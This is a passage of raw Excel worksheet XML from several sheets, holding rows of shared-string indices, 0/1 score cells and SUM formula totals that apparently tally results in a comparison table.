      <c r="F27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A28" s="27" t="s">
        <v>1181</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C28" s="9" t="s">
        <v>1192</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1192</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A29" s="27"/>
      <c r="B29" s="3" t="s">
        <v>1187</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="D29">
        <v>0</v>
      </c>
      <c r="E29">
        <v>0</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1903</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A30" s="27" t="s">
        <v>1182</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1189</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1325</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A31" s="27"/>
      <c r="B31" s="3" t="s">
        <v>1188</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>1197</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1197</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>52</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="27" t="s">
        <v>1183</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>69</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1194</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1199</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="27"/>
      <c r="B34" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="27" t="s">
        <v>1184</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="27"/>
      <c r="B36" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>75</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="165.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1185</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1186</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1326</v>
      </c>
      <c r="D37">
        <v>0</v>
      </c>
      <c r="E37">
        <v>0</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1195</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A38" s="6" t="s">
        <v>41</v>
      </c>
      <c r="D38" s="6">
        <f>SUM(D22:D37)</f>
        <v>14</v>
      </c>
      <c r="E38" s="6">
        <f t="shared" ref="E38:H38" si="1">SUM(E22:E37)</f>
        <v>14</v>
      </c>
      <c r="F38" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G38" s="6">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
      <c r="H38" s="6">
        <f t="shared" si="1"/>
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A30:A31"/>
    <mergeCell ref="A33:A34"/>
    <mergeCell ref="A35:A36"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A20:H20"/>
    <mergeCell ref="A24:A25"/>
    <mergeCell ref="A26:A27"/>
    <mergeCell ref="A28:A29"/>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EE4B-A2FF-4AA9-88EA-EB9269F1ED36}">
  <dimension ref="A1:H38"/>
  <sheetViews>
    <sheetView topLeftCell="A16" workbookViewId="0">
      <selection activeCell="J37" sqref="J37"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="27.109375" style="3" customWidth="1"/>
    <col min="2" max="2" width="19.44140625" style="3" customWidth="1"/>
    <col min="3" max="3" width="22.5546875" style="3" customWidth="1"/>
    <col min="4" max="4" width="10.21875" style="3" customWidth="1"/>
    <col min="5" max="5" width="10.33203125" style="3" customWidth="1"/>
    <col min="6" max="6" width="19.88671875" style="3" customWidth="1"/>
    <col min="7" max="7" width="9.77734375" style="3" customWidth="1"/>
    <col min="8" max="8" width="10.5546875" style="3" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="3"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="30" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>180</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ht="96.6" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>129</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>146</v>
      </c>
      <c r="D4" s="3">
        <v>0</v>
      </c>
      <c r="E4" s="3">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="G4" s="3">
        <v>1</v>
      </c>
      <c r="H4" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D5" s="3">
        <v>1</v>
      </c>
      <c r="E5" s="3">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G5" s="3">
        <v>1</v>
      </c>
      <c r="H5" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D6" s="3">
        <v>1</v>
      </c>
      <c r="E6" s="3">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G6" s="3">
        <v>1</v>
      </c>
      <c r="H6" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>12</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D8" s="3">
        <v>1</v>
      </c>
      <c r="E8" s="3">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G8" s="3">
        <v>1</v>
      </c>
      <c r="H8" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>13</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>33</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>33</v>
      </c>
      <c r="D9" s="3">
        <v>1</v>
      </c>
      <c r="E9" s="3">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>34</v>
      </c>
      <c r="G9" s="3">
        <v>1</v>
      </c>
      <c r="H9" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>82</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="D10" s="3">
        <v>1</v>
      </c>
      <c r="E10" s="3">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G10" s="3">
        <v>1</v>
      </c>
      <c r="H10" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>181</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>183</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>183</v>
      </c>
      <c r="D11" s="3">
        <v>1</v>
      </c>
      <c r="E11" s="3">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>183</v>
      </c>
      <c r="G11" s="3">
        <v>1</v>
      </c>
      <c r="H11" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>17</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12" s="3">
        <v>1</v>
      </c>
      <c r="E12" s="3">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G12" s="3">
        <v>1</v>
      </c>
      <c r="H12" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>182</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>184</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>1327</v>
      </c>
      <c r="D13" s="3">
        <v>1</v>
      </c>
      <c r="E13" s="3">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>184</v>
      </c>
      <c r="G13" s="3">
        <v>1</v>
      </c>
      <c r="H13" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="17" spans="1:8" s="18" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A17" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D17" s="18">
        <f>SUM(D4:D16)</f>
        <v>8</v>
      </c>
      <c r="E17" s="18">
        <f t="shared" ref="E17:H17" si="0">SUM(E4:E16)</f>
        <v>8</v>
      </c>
      <c r="F17" s="18">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G17" s="18">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="H17" s="18">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A20" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B20" s="25"/>
      <c r="C20" s="25"/>
      <c r="D20" s="25"/>
      <c r="E20" s="25"/>
      <c r="F20" s="25"/>
      <c r="G20" s="25"/>
      <c r="H20" s="25"/>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G21" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H21" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D22" s="3">
        <v>1</v>
      </c>
      <c r="E22" s="3">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G22" s="3">
        <v>1</v>
      </c>
      <c r="H22" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D23" s="3">
        <v>1</v>
      </c>
      <c r="E23" s="3">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G23" s="3">
        <v>1</v>
      </c>
      <c r="H23" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="27" t="s">
        <v>1180</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D24" s="3">
        <v>1</v>
      </c>
      <c r="E24" s="3">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G24" s="3">
        <v>1</v>
      </c>
      <c r="H24" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="27"/>
      <c r="B25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="D25" s="3">
        <v>1</v>
      </c>
      <c r="E25" s="3">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="G25" s="3">
        <v>1</v>
      </c>
      <c r="H25" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="27" t="s">
        <v>48</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="D26" s="3">
        <v>1</v>
      </c>
      <c r="E26" s="3">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="G26" s="3">
        <v>1</v>
      </c>
      <c r="H26" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A27" s="27"/>
      <c r="B27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D27" s="3">
        <v>1</v>
      </c>
      <c r="E27" s="3">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G27" s="3">
        <v>1</v>
      </c>
      <c r="H27" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="27" t="s">
        <v>1181</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C28" s="9" t="s">
        <v>1192</v>
      </c>
      <c r="D28" s="3">
        <v>1</v>
      </c>
      <c r="E28" s="3">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1192</v>
      </c>
      <c r="G28" s="3">
        <v>1</v>
      </c>
      <c r="H28" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="27"/>
      <c r="B29" s="3" t="s">
        <v>1187</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1324</v>
      </c>
      <c r="D29" s="3">
        <v>1</v>
      </c>
      <c r="E29" s="3">
        <v>0</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1196</v>
      </c>
      <c r="G29" s="3">
        <v>1</v>
      </c>
      <c r="H29" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="27" t="s">
        <v>1200</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1189</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="D30" s="3">
        <v>1</v>
      </c>
      <c r="E30" s="3">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="G30" s="3">
        <v>1</v>
      </c>
      <c r="H30" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="27"/>
      <c r="B31" s="3" t="s">
        <v>67</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>67</v>
      </c>
      <c r="D31" s="3">
        <v>1</v>
      </c>
      <c r="E31" s="3">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>67</v>
      </c>
      <c r="G31" s="3">
        <v>1</v>
      </c>
      <c r="H31" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>52</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="D32" s="3">
        <v>1</v>
      </c>
      <c r="E32" s="3">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="G32" s="3">
        <v>1</v>
      </c>
      <c r="H32" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="27" t="s">
        <v>1201</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>69</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1206</v>
      </c>
      <c r="D33" s="3">
        <v>1</v>
      </c>
      <c r="E33" s="3">
        <v>0</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1209</v>
      </c>
      <c r="G33" s="3">
        <v>1</v>
      </c>
      <c r="H33" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A34" s="27"/>
      <c r="B34" s="3" t="s">
        <v>1204</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="D34" s="3">
        <v>1</v>
      </c>
      <c r="E34" s="3">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1208</v>
      </c>
      <c r="G34" s="3">
        <v>1</v>
      </c>
      <c r="H34" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="27" t="s">
        <v>1184</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1164</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="D35" s="3">
        <v>1</v>
      </c>
      <c r="E35" s="3">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="G35" s="3">
        <v>1</v>
      </c>
      <c r="H35" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="27"/>
      <c r="B36" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D36" s="3">
        <v>1</v>
      </c>
      <c r="E36" s="3">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="G36" s="3">
        <v>1</v>
      </c>
      <c r="H36" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="122.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1202</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1203</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1328</v>
      </c>
      <c r="D37" s="3">
        <v>1</v>
      </c>
      <c r="E37" s="3">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1207</v>
      </c>
      <c r="G37" s="3">
        <v>1</v>
      </c>
      <c r="H37" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" s="18" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A38" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D38" s="18">
        <f>SUM(D22:D37)</f>
        <v>16</v>
      </c>
      <c r="E38" s="18">
        <f t="shared" ref="E38:H38" si="1">SUM(E22:E37)</f>
        <v>14</v>
      </c>
      <c r="F38" s="18">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G38" s="18">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
      <c r="H38" s="18">
        <f t="shared" si="1"/>
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A30:A31"/>
    <mergeCell ref="A33:A34"/>
    <mergeCell ref="A35:A36"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A20:H20"/>
    <mergeCell ref="A24:A25"/>
    <mergeCell ref="A26:A27"/>
    <mergeCell ref="A28:A29"/>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4ADF7-68ED-46E9-BEAE-51AEE045F10F}">
  <dimension ref="A1:H62"/>
  <sheetViews>
    <sheetView topLeftCell="A52" workbookViewId="0">
      <selection activeCell="E34" sqref="E34"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="33.88671875" customWidth="1"/>
    <col min="2" max="2" width="26.33203125" customWidth="1"/>
    <col min="3" max="3" width="28.6640625" customWidth="1"/>
    <col min="4" max="5" width="10.88671875" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="12.77734375" customWidth="1"/>
    <col min="8" max="8" width="14.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="29.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>185</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>186</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>188</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>214</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>189</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>189</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>190</v>
      </c>
      <c r="B6" s="3"/>
      <c r="C6" s="3"/>
      <c r="F6" s="3"/>
    </row>
    <row r="7" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>191</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>215</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>216</v>
      </c>
      <c r="D7">
        <v>0</v>
      </c>
      <c r="E7">
        <v>0</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>192</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>193</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>194</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>217</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>0</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>220</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>195</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>196</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>218</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>0</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>221</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>78</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>106</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>106</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>106</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>197</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>198</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>198</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>198</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>200</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>200</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>200</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>201</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>202</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>1331</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>202</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>200</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>200</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>200</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
